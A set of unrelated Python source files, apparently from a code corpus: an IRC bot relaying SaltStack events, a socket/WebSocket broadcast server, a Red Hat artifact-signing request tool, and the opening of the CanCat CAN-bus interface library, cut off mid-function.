'mock_operators', {},
[MockReader(data_queue)], writer)
runner.set_op(generator_operator.GeneratorOperator())
t = threading.Thread(target=run, args=(runner, ))
t.start()
data_queue.put('error_data')
runner.join()
self.assertEqual(runner.status, RunnerStatus.FAILED)
|
saltbot.py | #!/usr/bin/env python
# This script is under GPL License v2
# (c) Jean-Michel LACROIX 2006 (jm-lacroix@savigny.org)
# (c) Tor Hveem 2008-2014
from twisted.words.protocols import irc
from twisted.internet import reactor, protocol, threads
from twisted.python import log
from twisted.internet import threads
from twisted.internet.protocol import Protocol
from twisted.application import internet, service
from yaml import safe_load
import threading
import thread, os, time, sys, string
config = safe_load(file('config.yaml').read())
GreenColor = '\x033,1'
YellowColor = '\x038,1'
RedColor = '\x034,1'
def salteventlistener(bot, run):
import isea
import iseafilter
import iseaformatter
# Reload code on every thread start
reload(isea)
reload(iseafilter)
reload(iseaformatter)
from isea import Isea
from iseafilter import IseaFilter
from iseaformatter import IseaFormatter
def output(data):
bot.msg(config['irc']['channel'], IseaFormatter(data), length=400)
isea = Isea()
# TODO:
# support more elaborate filtering
f2 = IseaFilter('Fun')
f2.add_filter('fun', config['filters']['functions'])
isea.add_filter(f2)
#bot.msg(config['irc']['channel'], 'Isea object: {}'.format(isea))
isea.listen(config['salt']['target'], '/var/run/salt', output, run)
class ircProtocol(irc.IRCClient):
"""A logging IRC bot."""
nickname = config['irc']['nick']
password = config['irc']['password']
def __init__(self):
self.start()
def start(self):
from isea import IseaController
self.run = IseaController(True)
self.isea_thread = threading.Thread(target=salteventlistener, args=(self,self.run,))
self.isea_thread.start()
def stop(self):
self.run.set(False)
def running(self):
return self.isea_thread.isAlive()
def printResult(self, result):
self.msg(config['irc']['channel'], result)
d = threads.deferToThread(self.doLongCalculation)
d.addCallback(self.printResult)
#def connectionMade(self):
# self.factory.client = self
# irc.IRCClient.connectionMade(self)
# irc.IRCClient.connectionMade(self)
#def connectionLost(self, reason):
# irc.IRCClient.connectionLost(self, reason)
# try:
# self.thread.exit()
# except Exception, e:
# print e
# pass
def signedOn(self):
"""Called when bot has succesfully signed on to server."""
self.join(config['irc']['channel'])
self.factory.client = self
# Start reactor
if not self.running():
self.start()
def joined(self, channel):
"""This will get called when the bot joins the channel."""
#self.thread = thread.start_new_thread(recupere_pipe, (self,))
#d = threads.deferToThread(self.doLongCalculation)
#d.addCallback(self.printResult)
self.msg(channel, 'Be greeted. I return from the dead.')
#bot = self
#self.salteventthread = thread.start_new_thread(salteventlistener, (self,))
#reactor.callFromThread(salteventlistener, self)
def privmsg(self, user, channel, msg):
"""This will get called when the bot receives a message."""
user = user.split('!', 1)[0]
log.msg("<%s> %s" % (user, msg))
if msg == '!stop':
if not self.running():
return
self.stop()
while self.running():
''' Waiting for event listen loop to to terminate'''
pass
self.msg(channel, 'Stopped ISEA!')
return
elif msg == '!start':
if self.running():
self.msg(channel, 'ISEA is already running!')
return
else:
self.start()
self.msg(config['irc']['channel'], 'Started ISEA!')
return
elif msg == '!reload':
self.msg(channel, 'Reloading ISEA!')
self.stop()
while self.running():
pass
self.start()
self.msg(channel, 'Reloaded ISEA!')
return
# Check to see if they're sending me a private message
if channel == self.nickname:
msg = "It isn't nice to whisper! Play nice with the group."
self.msg(user, msg)
return
# Otherwise check to see if it is a message directed at me
if msg.startswith(self.nickname + ":"):
msg = "%s: I am a bot. Why so serious?" % user
self.msg(channel, msg)
#self.logger.log("<%s> %s" % (self.nickname, msg))
def action(self, user, channel, msg):
"""This will get called when the bot sees someone do an action."""
user = user.split('!', 1)[0]
#self.logger.log("* %s %s" % (user, msg))
def irc_NICK(self, prefix, params):
"""Called when an IRC user changes their nickname."""
old_nick = prefix.split('!')[0]
new_nick = params[0]
#self.logger.log("%s is now known as %s" % (old_nick, new_nick))
def alert(self, msg):
self.IRCClient.msg(config['irc']['channel'], msg)
class LogBotFactory(protocol.ClientFactory):
"""A factory for LogBots.
A new protocol instance will be created each time we connect to the server.
"""
# the class of the protocol to build when new connection is made
protocol = ircProtocol
#def __init__(self), channel):
# self.channel = channel
#
def clientConnectionLost(self, connector, reason):
"""If we get disconnected, reconnect to server."""
connector.connect()
def clientConnectionFailed(self, connector, reason):
print "connection failed:", reason
reactor.stop()
application = service.Application("saltbot")
ircf = LogBotFactory()
irc = internet.TCPClient(config['irc']['server'], config['irc']['port'], ircf)
irc.setName('irc')
irc.setServiceParent(application)
|
transfer.py | import socket
import threading
from .WebSocket.WebSocket import WebSocket
from Config import config
ADDRESS = config.Project.server_host
PORT = config.Project.port
ALLOW = config.Project.allow_host
def broadcast(message): # broadcast function declaration
for Receiver in receivers:
Receiver.send(message)
def handleSend(client):
while True:
try: # recieving valid messages from client
message = client.recv(1024).decode()
# print(message)
broadcast(message)
except:
client.close()
print("====== Send Close ======")
broadcast('Send Closed')
break
def handleReceive(Receiver):
while True:
try: # recieving valid messages from client
message = Receiver.client.recv(1024)
broadcast(message)
except: # removing receivers
receivers.remove(Receiver)
Receiver.client.close()
print("====== Receive Close ======")
broadcast('Receive Closed')
break
def transfer(): # accepting multiple receivers
ADDRESS = config.Project.server_host
global receivers
receivers = []
print("====== Server {} Start ======".format(PORT))
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # socket initialization
server.bind((ADDRESS, PORT)) # binding limit and port to socket
server.listen()
while True:
client, ADDRESS = server.accept()
key = client.recv(1024)
try:
value = key.decode()
print(value)
except:
print(f'ERROR MESSAGE: {key}')
value = ""
if "GET / HTTP/1.1" in value:
print("====== Receive Connection Built ======")
try:
Receiver = WebSocket(client)
Receiver.init(key)
except:
continue
try:
info = client.recv(8096)
except Exception as e:
info = "None"
body = Receiver.unpackage(info)
#send_msg(client, "OK".encode())
Receiver.send('Success')
receivers.append(Receiver)
broadcast("Connect Receive Server Success")
Receive_Thread = threading.Thread(target=handleReceive, args=(Receiver,))
Receive_Thread.start()
continue
else:
print("====== Send Connection Built ======")
broadcast("Connect Send Server Success")
client.send('Success'.encode())
Send_Thread = threading.Thread(target=handleSend, args=(client,))
Send_Thread.start() |
umb_producer.py | #!/usr/bin/env python2
import base64
import json
import logging
import ssl
import subprocess
import sys
import threading
import click
import requests
from rhmsg.activemq.producer import AMQProducer
from rhmsg.activemq.consumer import AMQConsumer
# Expose errors during signing for debugging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
######################################################################
URLS = {
'dev': (
'amqps://messaging-devops-broker01.dev1.ext.devlab.redhat.com:5671',
'amqps://messaging-devops-broker02.dev1.ext.devlab.redhat.com:5671',
),
'qa': (
'amqps://messaging-devops-broker01.web.qa.ext.phx1.redhat.com:5671',
'amqps://messaging-devops-broker02.web.qa.ext.phx1.redhat.com:5671',
),
'stage': (
'amqps://messaging-devops-broker01.web.stage.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker02.web.stage.ext.phx2.redhat.com:5671',
),
'prod': (
'amqps://messaging-devops-broker01.web.prod.ext.phx2.redhat.com:5671',
'amqps://messaging-devops-broker02.web.prod.ext.phx2.redhat.com:5671',
),
}
TOPIC = 'VirtualTopic.eng.art.artifact.sign'
# TODO: In the future we need to handle 'rhcos' having '4.1'
# hard-coded into the URL path.
MESSAGE_DIGESTS = {
'openshift': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/clients/{release_stage}/{release_name}/sha256sum.txt',
'rhcos': 'https://mirror.openshift.com/pub/openshift-v4/{arch}/dependencies/rhcos/{release_name_xy}/{release_name}/sha256sum.txt'
}
DEFAULT_CA_CHAIN = "/etc/pki/ca-trust/source/anchors/RH-IT-Root-CA.crt"
# This is the JSON we send OVER the bus when requesting signatures
SIGN_REQUEST_MESSAGE_FIELDS = [
"artifact",
# Added by ART
"artifact_meta",
"request_id",
"requestor",
"sig_keyname",
]
ART_CONSUMER = 'Consumer.openshift-art-signatory.{env}.VirtualTopic.eng.robosignatory.art.sign'
def get_release_tag(release_name, arch):
"""Determine the quay destination tag where a release image lives, based on the
release name and arch (since we can now have multiple arches for each release name)
- make sure it includes the arch in the tag to distinguish from any other releases of same name.
e.g.:
(4.2.0-0.nightly-s390x-2019-12-10-202536, s390x) remains 4.2.0-0.nightly-s390x-2019-12-10-202536
(4.3.0-0.nightly-2019-12-07-121211, x86_64) becomes 4.3.0-0.nightly-2019-12-07-121211-x86_64
"""
return release_name if arch in release_name else "{}-{}".format(release_name, arch)
######################################################################
# Click stuff! Define these here and reuse them later because having
# 'required' options in the global context creates a poor user
# experience. Running "this-script <sub-command> --help" won't work
# until every global required option is provided.
context_settings = dict(help_option_names=['-h', '--help'])
requestor = click.option("--requestor", required=True, metavar="USERID",
help="The user who requested the signature")
product = click.option("--product", required=True,
type=click.Choice(["openshift", "rhcos"]),
help="Which product this signature is for")
request_id = click.option("--request-id", required=True, metavar="BUILDURL",
help="Unique build job identifier for this signing request, "
"use the job URL from Jenkins: $env.BUILD_URL")
sig_keyname = click.option("--sig-keyname", required=True,
type=click.Choice(['test', 'redhatrelease2', 'beta2']),
help="Name of the key to have sign our request")
release_name_opt = click.option("--release-name", required=True, metavar="SEMVER",
help="Numerical name of this release, for example: 4.1.0-rc.10")
arch_opt = click.option("--arch", required=True, metavar="ARCHITECTURE",
type=click.Choice(['x86_64', 'ppc64le', 's390x']),
help="Which architecture this release was built for")
client_type = click.option("--client-type", required=True, metavar="VAL",
type=click.Choice(['ocp', 'ocp-dev-preview']),
help="What type of client needs to be signed")
client_cert = click.option("--client-cert", required=True, metavar="CERT-PATH",
type=click.Path(exists=True),
help="Path to the client certificate for UMB authentication")
client_key = click.option("--client-key", required=True, metavar="KEY-PATH",
type=click.Path(exists=True),
help="Path to the client key for UMB authentication")
env = click.option("--env", required=False, metavar="ENVIRONMENT",
default='stage',
type=click.Choice(['dev', 'stage', 'prod']),
help="Which UMB environment to send to")
noop = click.option("--noop", type=bool, is_flag=True, default=False,
help="If given, DO NOT request signature, "
"show the JSON that WOULD be sent over the bus")
ca_certs = click.option("--ca-certs", type=click.Path(exists=True),
default=DEFAULT_CA_CHAIN,
help="Manually specify the path to the RHIT CA Trust Chain. "
"Default: {}".format(DEFAULT_CA_CHAIN))
digest = click.option("--digest", metavar="DIGEST", help="Pass the digest that should be signed")
# ---------------------------------------------------------------------
@click.group(context_settings=context_settings)
def cli(**kwargs):
"""Helper utility for internal Red Hat use ONLY. Use in a build job to
request signatures for various artifacts produced as part of an
Openshift 4.x release. Signatures are requested by sending a JSON blob
over the Universal Message Bus to the 'robosignatory' (RADAS).
You may override the default path to look for the Red Hat IT
Certificate Authority trust chain by using the --ca-certs option in
the global context (before the sub-command).
"""
pass
######################################################################
# Helpers
def get_digest_base64(location):
"""Download the sha256sum.txt message digest file at the given
`location`.
:return: A `string` of the base64-encoded message digest
"""
res = requests.get(location,
verify=ssl.get_default_verify_paths().openssl_cafile)
if res.status_code == 200:
# b64encode needs a bytes type input, use the dedicated
# 'encode' method to turn str=>bytes. The result of
# `b64encode` is a bytes type. Later when we go to serialize
# this with json it needs to be a str type so we will decode
# the bytes=>str now.
return base64.b64encode(res.text.encode()).decode()
else:
raise(Exception(res.reason))
def presend_validation(message):
"""Verify the message we want to send over the bus has all the
required fields
"""
for field in SIGN_REQUEST_MESSAGE_FIELDS:
if field not in message:
return field
return True
def oc_image_info(pullspec):
"""Get metadata for an image at the given `pullspec`
:return: a dict with the serialzed JSON from the 'oc image info'
call
"""
image_info_raw = subprocess.check_output(
['oc', 'image', 'info', '-o', 'json', pullspec])
return json.loads(image_info_raw)
def get_bus_producer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a producer. We're going to
need this in multiple places so we want to ensure we do it the
same way each time.
"""
return AMQProducer(urls=URLS[env or 'stage'],
certificate=certificate,
private_key=private_key,
trusted_certificates=trusted_certificates,
topic=TOPIC)
def producer_thread(producer, args):
print(args)
producer.send_msg(*args)
def producer_send_msg(producer, *args):
t = threading.Thread(target=producer_thread, args=(producer, args))
t.start()
t.join()
def get_bus_consumer(env, certificate, private_key, trusted_certificates):
"""This is just a wrapper around creating a consumer. We're going to
do need this in multiple places though, so we want to ensure we do it
the same way each time.
"""
return AMQConsumer(urls=URLS[env or 'stage'], certificate=certificate,
private_key=private_key, trusted_certificates=trusted_certificates)
def art_consumer_callback(msg, notsure):
"""`msg` is a `Message` object which has various attributes. Such as `body`.
`notsure` I am not sure what that is. I only got as far as knowing
this callback requires two parameters.
"""
print(msg)
body = json.loads(msg.body)
print(json.dumps(body, indent=4))
if body['msg']['signing_status'] != 'success':
print("ERROR: robosignatory failed to sign artifact")
exit(1)
else:
# example: https://datagrepper.stage.engineering.redhat.com/id?id=2019-0304004b-d1e6-4e03-b28d-cfa1e5f59948&is_raw=true&size=extra-large
result = body['msg']['signed_artifact']
out_file = body['msg']['artifact_meta']['name']
with open(out_file, 'w') as fp:
fp.write(base64.decodestring(result))
fp.flush()
print("Wrote {} to disk".format(body['msg']['artifact_meta']['name']))
return True
def consumer_thread(consumer):
consumer.consume(ART_CONSUMER.format(env=env), art_consumer_callback)
def consumer_start(consumer):
t = threading.Thread(target=consumer_thread, args=(consumer,))
t.start()
return t
def get_producer_consumer(env, certificate, private_key, trusted_certificates):
producer = get_bus_producer(env, certificate, private_key, trusted_certificates)
consumer = get_bus_consumer(env, certificate, private_key, trusted_certificates)
return (producer, consumer)
######################################################################
@cli.command("message-digest", short_help="Sign a sha256sum.txt file")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@arch_opt
@click.pass_context
def message_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, arch):
"""Sign a 'message digest'. These are sha256sum.txt files produced by
the 'sha256sum` command (hence the strange command name). In the ART
world, this is for signing message digests from extracting OpenShift
tools, as well as RHCOS bare-betal message digests.
"""
if product == 'openshift':
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name=release_name,
release_stage=client_type)
elif product == 'rhcos':
release_parts = release_name.split('.')
artifact_url = MESSAGE_DIGESTS[product].format(
arch=arch,
release_name_xy='.'.join(release_parts[:2]),
release_name=release_name)
artifact = get_digest_base64(artifact_url)
message = {
"artifact": artifact,
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": "sha256sum.txt.gpg",
"type": "message-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
@cli.command("json-digest", short_help="Sign a JSON digest claim")
@requestor
@product
@request_id
@sig_keyname
@release_name_opt
@client_cert
@client_key
@client_type
@env
@noop
@ca_certs
@digest
@arch_opt
@click.pass_context
def json_digest(ctx, requestor, product, request_id, sig_keyname,
release_name, client_cert, client_key, client_type, env, noop,
ca_certs, digest, arch):
"""Sign a 'json digest'. These are JSON blobs that associate a
pullspec with a sha256 digest. In the ART world, this is for "signing
payload images". After the json digest is signed we publish the
signature in a location which follows a specific directory pattern,
thus allowing the signature to be looked up programmatically.
"""
json_claim = {
"critical": {
"image": {
"docker-manifest-digest": None
},
"type": "atomic container signature",
"identity": {
"docker-reference": None,
}
},
"optional": {
"creator": "Red Hat OpenShift Signing Authority 0.0.1",
},
}
release_stage = "ocp-release-nightly" if client_type == 'ocp-dev-preview' else "ocp-release"
release_tag = get_release_tag(release_name, arch)
pullspec = "quay.io/openshift-release-dev/{}:{}".format(release_stage, release_tag)
json_claim['critical']['identity']['docker-reference'] = pullspec
if not digest:
digest = oc_image_info(pullspec)['digest']
json_claim['critical']['image']['docker-manifest-digest'] = digest
print("ARTIFACT to send for signing (WILL BE base64 encoded first):")
print(json.dumps(json_claim, indent=4))
message = {
"artifact": base64.b64encode(json.dumps(json_claim).encode()).decode(),
"artifact_meta": {
"product": product,
"release_name": release_name,
"name": json_claim['critical']['image']['docker-manifest-digest'].replace(':', '='),
"type": "json-digest",
},
"request_id": request_id,
"requestor": requestor,
"sig_keyname": sig_keyname,
}
validated = presend_validation(message)
if validated is True:
print("Message contains all required fields")
to_send = json.dumps(message)
else:
print("Message missing required field: {}".format(validated))
exit(1)
if noop:
print("Message we would have sent over the bus:")
print(to_send)
else:
producer, consumer = get_producer_consumer(env, client_cert, client_key, ca_certs)
consumer_thread = consumer_start(consumer)
producer_send_msg(producer, {}, to_send)
print("Message we sent over the bus:")
print(to_send)
print("Submitted request for signing. The mirror-artifacts job should be triggered when a response is sent back")
print("Waiting for consumer to receive data back from request")
consumer_thread.join()
######################################################################
if __name__ == '__main__':
cli()
|
__init__.py | from __future__ import print_function
from past.builtins import xrange
from builtins import input, bytes
import six
import os
import sys
import cmd
import time
import serial
import select
import struct
import threading
import math
import pickle
import binascii
from cancat import iso_tp
baud = 4000000
# command constants (used to identify messages between
# python client and the CanCat transceiver
CMD_LOG = 0x2f
CMD_LOG_HEX = 0x2e
CMD_CAN_RECV = 0x30
CMD_PING_RESPONSE = 0x31
CMD_CHANGE_BAUD_RESULT = 0x32
CMD_CAN_BAUD_RESULT = 0x33
CMD_CAN_SEND_RESULT = 0x34
CMD_ISO_RECV = 0x35
CMD_SET_FILT_MASK = 0x36
CMD_CAN_MODE_RESULT = 0x37
CMD_CAN_SEND_ISOTP_RESULT = 0x38
CMD_CAN_RECV_ISOTP_RESULT = 0x39
CMD_CAN_SENDRECV_ISOTP_RESULT = 0x3A
CMD_SET_FILT_MASK_RESULT = 0x3B
CMD_PRINT_CAN_REGS = 0x3C
CMD_PING = 0x41
CMD_CHANGE_BAUD = 0x42
CMD_CAN_BAUD = 0x43
CMD_CAN_SEND = 0x44
CMD_CAN_MODE = 0x45
CMD_CAN_MODE_SNIFF_CAN0 = 0x00 # Start sniffing on can 0
CMD_CAN_MODE_SNIFF_CAN1 = 0x01 # Start sniffing on can 1
CMD_CAN_MODE_CITM = 0x02 # Start CITM between can1 and can2
CMD_CAN_SEND_ISOTP = 0x46
CMD_CAN_RECV_ISOTP = 0x47
CMD_CAN_SENDRECV_ISOTP = 0x48
CAN_RESP_OK = (0)
CAN_RESP_FAILINIT = (1)
CAN_RESP_FAILTX = (2)
CAN_RESP_MSGAVAIL = (3)
CAN_RESP_NOMSG = (4)
CAN_RESP_CTRLERROR = (5)
CAN_RESP_GETTXBFTIMEOUT = (6)
CAN_RESP_SENDMSGTIMEOUT = (7)
CAN_RESP_FAIL = (0xff)
CAN_RESPS = { v: k for k,v in globals().items() if k.startswith('CAN_RESP_') }
# constants for setting baudrate for the CAN bus
CAN_AUTOBPS = 0
CAN_5KBPS = 1
CAN_10KBPS = 2
CAN_20KBPS = 3
CAN_25KBPS = 4
CAN_31K25BPS = 5
CAN_33KBPS = 6
CAN_40KBPS = 7
CAN_50KBPS = 8
CAN_80KBPS = 9
CAN_83K3BPS = 10
CAN_95KBPS = 11
CAN_100KBPS = 12
CAN_125KBPS = 13
CAN_200KBPS = 14
CAN_250KBPS = 15
CAN_500KBPS = 16
CAN_666KBPS = 17
CAN_1000KBPS = 18
# state constants for the Receiver thread
RXTX_DISCONN = -1
RXTX_SYNC = 0
RXTX_GO = 1
# constants for CANreplay mode
TIMING_FAST = 0
TIMING_REAL = 1
TIMING_INTERACTIVE = 2
TIMING_SEARCH = 3
# constants for VIEW settings:
VIEW_ASCII = 1<<0
VIEW_COMPARE = 1<<1
VIEW_BOOKMARKS = 1<<2
VIEW_TS_DELTA = 1<<3
VIEW_ENDSUM = 1<<4
VIEW_ALL = VIEW_ASCII | VIEW_COMPARE | VIEW_BOOKMARKS | VIEW_TS_DELTA | VIEW_ENDSUM
# message id's and metadata (soon to be moved into modules)
GM_messages = {
}
Ford_messages = {
}
Chrysler_messages = {
}
Toyota_messages = {
}
Honda_messages = {
}
VW_messages = {
}
Nissan_messages = {
}
Mitsubishi_messages = {
}
Hyundai_messages = {
}
Kia_messages = {
}
Suzuki_messages = {
}
Harley_messages = {
}
# helper functions for printing log messages from the CanCat Transceiver
def handleLogToScreen(message, canbuf):
print('LOG: %s' % repr(message))
def handleLogHexToScreen(message, canbuf):
num = struct.unpack("<L", message)
print('LOG: %x' % num)
def handleCanMsgsDuringSniff(message, canbuf, arbids=None):
ts = time.time()
idx = canbuf._submitMessage(CMD_CAN_RECV, (ts, message))
arbid, data = canbuf._splitCanMsg(message)
if arbids:
if arbid in arbids:
print(reprCanMsg(idx, ts, arbid, data))
else:
print(reprCanMsg(idx, ts, arbid, data))
default_cmdhandlers = {
CMD_LOG : handleLogToScreen,
CMD_LOG_HEX: handleLogHexToScreen,
}
def loadCanBuffer(filename):
return pickle.load(open(filename))
def keystop(delay=0):
if os.name == 'posix':
return len(select.select([sys.stdin],[],[],delay)[0])
else:
return msvcrt.kbhit()
class SPECIAL_CASE(object):
pass
DONT_PRINT_THIS_MESSAGE = SPECIAL_CASE
class CanInterface(object):
_msg_source_idx = CMD_CAN_RECV
def __init__(self, port=None, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
'''
CAN Analysis Workspace
This can be subclassed by vendor to allow more vendor-specific code
based on the way each vendor uses the varios Buses
'''
if orig_iface != None:
self._consumeInterface(orig_iface)
return
self.init(port, baud, verbose, cmdhandlers, comment, load_filename, orig_iface, max_msgs)
def init(self, port=None, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None, max_msgs=None):
self._inbuf = b''
self._trash = []
self._messages = {}
self._msg_events = {}
self._queuelock = threading.Lock()
self._config = {}
self._config['shutdown'] = False
self._config['go'] = False
self._max_msgs = self._config['max_msgs'] = max_msgs
self.verbose = self._config['verbose'] = verbose
self.port = self._config['port'] = port
self._baud = self._config['baud'] = baud
self.name = self._config['name'] = 'CanCat'
self._io = None
self._in_lock = None
self._out_lock = None
self._commsthread = None
self._last_can_msg = None
self.bookmarks = []
self.bookmark_info = {}
self.comments = []
if cmdhandlers == None:
cmdhandlers = default_cmdhandlers
self._cmdhandlers = cmdhandlers
if load_filename != None:
self.loadFromFile(load_filename)
#### FIXME: make this a connection cycle, not just a "pick the first one" thing...
#### Prove that it's a CanCat... and that it's not in use by something else...
# If we specify a file and no port, assume we just want to read the file, only try to guess
# ports if there is no file specified
if self.port == None and load_filename == None:
self.port = getDeviceFile()
# No filename, can't guess the port, whatcha gonna do?
if self.port == None and load_filename == None:
raise Exception("Cannot find device, and no filename specified. Please try again.")
if self.port != None:
self._reconnect()
# just start the receive thread, it's lightweight and you never know when you may want it.
self._startRxThread()
self._config['go'] = True
def _startRxThread(self):
self._commsthread = threading.Thread(target=self._rxtx)
self._commsthread.setDaemon(True)
self._commsthread.start()
def register_handler(self, cmd, handler):
self._cmdhandlers[cmd] = handler
def remove_handler(self, cmd):
self._cmdhandlers[cmd] = None
def _consumeInterface(self, other):
other._config['go'] = False
for k,v in vars(other).items():
setattr(self, k, v)
if other._commsthread != None:
self._startRxThread()
def _reconnect(self, port=None, baud=None):
'''
Attempt to connect/reconnect to the CanCat Transceiver
'''
if self.port == None and port == None:
print("cannot connect to an unspecified port")
return
if self._io != None:
self._io.close()
# SHIM to allow us to easily specify a Fake CanCat for testing
if self.port == 'FakeCanCat':
import cancat.test as testcat
self._io = testcat.FakeCanCat()
else:
self._io = serial.Serial(port=self.port, baudrate=self._baud, dsrdtr=True, timeout=None)
self._io.setDTR(True)
# clear all locks and free anything waiting for them
if self._in_lock != None:
while self._in_lock.locked_lock():
self._in_lock.release()
time.sleep(.01)
self._in_lock = threading.Lock()
if self._out_lock != None:
while self._out_lock.locked_lock():
self._out_lock.release()
time.sleep(.01)
self._out_lock = threading.Lock()
time.sleep(1)
return self._io
def __del__(self):
'''
Destructor, called when the CanInterface object is being garbage collected
'''
if self._io and isinstance(self._io, serial.Serial):
print("shutting down serial connection")
self._io.close()
self._config['shutdown'] = True
if self._commsthread != None:
self._commsthread.wait()
def clearCanMsgs(self):
'''
Clear out all messages currently received on the CAN bus, allowing for
basically a new analysis session without creating a new object/connection
returns a list of the messages
'''
allmsgs = self.recvall(CMD_CAN_RECV)
# Clear the bookmarks as well because they are no longer meaningful
self.bookmarks = []
self.bookmark_info = {}
return allmsgs
def _rxtx(self):
'''
Receiver thread runner. Internal use only.
Processes data from the CanCat transceiver, parses and places messages
into correct mailboxes and/or hands off to pre-configured handlers.
'''
self._rxtx_state = RXTX_SYNC
while not self._config['shutdown']:
try:
if not self._config['go']:
time.sleep(.4)
continue
if self.verbose > 4:
if self.verbose > 5:
print("STATE: %s" % self._rxtx_state)
else:
sys.stderr.write('.')
# try to reconnect to disconnected unit (FIXME: not working right yet)
if self._rxtx_state == RXTX_DISCONN:
print("FIXME: reconnect disconnected serial port...")
time.sleep(1)
self._reconnect()
self._rxtx_state = RXTX_SYNC
continue
# fill the queue ##########################################
self._in_lock.acquire()
try:
char = self._io.read()
except serial.serialutil.SerialException as e:
self.errorcode = e
self.log("serial exception")
if "disconnected" in e.message:
self._io.close()
self._rxtx_state = RXTX_DISCONN
continue
finally:
if self._in_lock.locked_lock():
self._in_lock.release()
self._inbuf += char
#self.log("RECV: %s" % repr(self._inbuf), 4)
##########################################################
# FIXME: should we make the rest of this a separate thread, so we're not keeping messages from flowing?
# ====== it would require more locking/synchronizing...
# make sure we're synced
if self._rxtx_state == RXTX_SYNC:
if self._inbuf.startswith(b'@') != True:
self._queuelock.acquire()
try:
idx = self._inbuf.find(b'@')
if idx == -1:
self.log("sitting on garbage...", 3)
continue
trash = self._inbuf[:idx]
self._trash.append(trash)
self._inbuf = self._inbuf[idx:]
finally:
self._queuelock.release()
self._rxtx_state = RXTX_GO
# handle buffer if we have anything in it
if self._rxtx_state == RXTX_GO:
if len(self._inbuf) < 3: continue
if self._inbuf.startswith(b'@') != True:
self._rxtx_state = RXTX_SYNC
continue
pktlen = self._inbuf[1] + 2 # <size>, doesn't include "@"
if len(self._inbuf) >= pktlen:
self._queuelock.acquire()
try:
cmd = self._inbuf[2] # first bytes are @<size>
message = self._inbuf[3:pktlen]
self._inbuf = self._inbuf[pktlen:]
finally:
self._queuelock.release()
# generate the timestamp here
timestamp = time.time()
tsmsg = (timestamp, message)
#if we have a handler, use it
cmdhandler = self._cmdhandlers.get(cmd)
if cmdhandler != None:
cmdhandler(tsmsg, self)
# otherwise, file it
else:
self._submitMessage(cmd, tsmsg)
self._rxtx_state = RXTX_SYNC
except:
if self.verbose:
sys.excepthook(*sys.exc_info())
def _submitMessage(self, cmd, tsmsg):
'''
submits a message to the cmd mailbox. creates mbox if doesn't exist.
*threadsafe*
'''
mbox = self._messages.get(cmd)
if mbox == None:
mbox = []
self._messages[cmd] = mbox
self._msg_events[cmd] = threading.Event()
try:
self._queuelock.acquire()
mbox.append(tsmsg)
self._msg_events[cmd].set()
except Exception as e:
self.log("_submitMessage: ERROR: %r" % e, -1)
finally:
self._queuelock.release()
return len(mbox)-1
def log(self, message, verbose=2):
'''
print a log message. Only prints if CanCat's verbose setting >=verbose
'''
if self.verbose >= verbose:
print("%.2f %s: %s" % (time.time(), self.name, message))
def recv(self, cmd, wait=None):
'''
Warning: Destructive:
removes a message from a mailbox and returns it.
For CMD_CAN_RECV mailbox, this will alter analysis results!
'''
start = time.time()
while (time.time() - start) < wait:
mbox = self._messages.get(cmd)
if mbox != None and len(mbox):
self._queuelock.acquire()
try:
timestamp, message = mbox.pop(0)
finally:
self._queuelock.release()
return timestamp, message
time.sleep(.01)
return None, None
def recvall(self, cmd):
'''
Warning: Destructive:
removes ALL messages from a mailbox and returns them.
For CMD_CAN_RECV mailbox, this is like getting a new
analysis session
'''
mbox = self._messages.get(cmd)
if mbox == None:
return []
self._queuelock.acquire()
try:
messages = list(mbox)
self._messages[cmd] = []
finally:
self._queuelock.release()
return messages
def _inWaiting(self, cmd):
'''
Does the given cmd mailbox have any messages??
'''
mbox = self._messages.get(cmd)
if mbox == None:
return 0
return len(mbox)
def _send(self, cmd, message):
'''
Send a message to the CanCat transceiver (not the CAN bus)
'''
msgchar = bytes(struct.pack(">H", len(message) + 3)) # 2 byte Big Endian
cmdByte = bytes(struct.pack('B', cmd))
message = self._bytesHelper(message)
msg = msgchar + cmdByte + message
self.log("XMIT: %s" % repr(msg), 4)
try:
self._out_lock.acquire()
try:
self._io.write(msg)
finally:
self._out_lock.release()
# FIXME: wait for response?
except Exception as e:
print("Exception: %r" % e)
#print("Could not acquire lock. Are you trying interactive commands without an active connection?")
def CANrecv(self, count=1):
'''
Warning: Destructive:
removes a message from the received CAN messages and returns it.
== This will alter analysis results! ==
'''
if count == -1:
count = self.getCanMsgCount()
for x in range(count):
yield self.recv(CMD_CAN_RECV)
def CANxmit(self, arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit a CAN message on the attached CAN bus
Currently returns the *last* result
'''
msg = struct.pack('>I', arbid) + struct.pack('B', extflag) + self._bytesHelper(message)
for i in range(count):
self._send(CMD_CAN_SEND, msg)
ts, result = self.recv(CMD_CAN_SEND_RESULT, timeout)
if result == None:
print("CANxmit: Return is None!?")
return None
resval = ord(result)
if resval != 0:
print("CANxmit() failed: %s" % CAN_RESPS.get(resval))
return resval
def ISOTPxmit(self, tx_arbid, rx_arbid, message, extflag=0, timeout=3, count=1):
'''
Transmit an ISOTP can message. tx_arbid is the arbid we're transmitting,
and rx_arbid is the arbid we're listening for
'''
msg = struct.pack('>IIB', tx_arbid, rx_arbid, extflag) + message
for i in range(count):
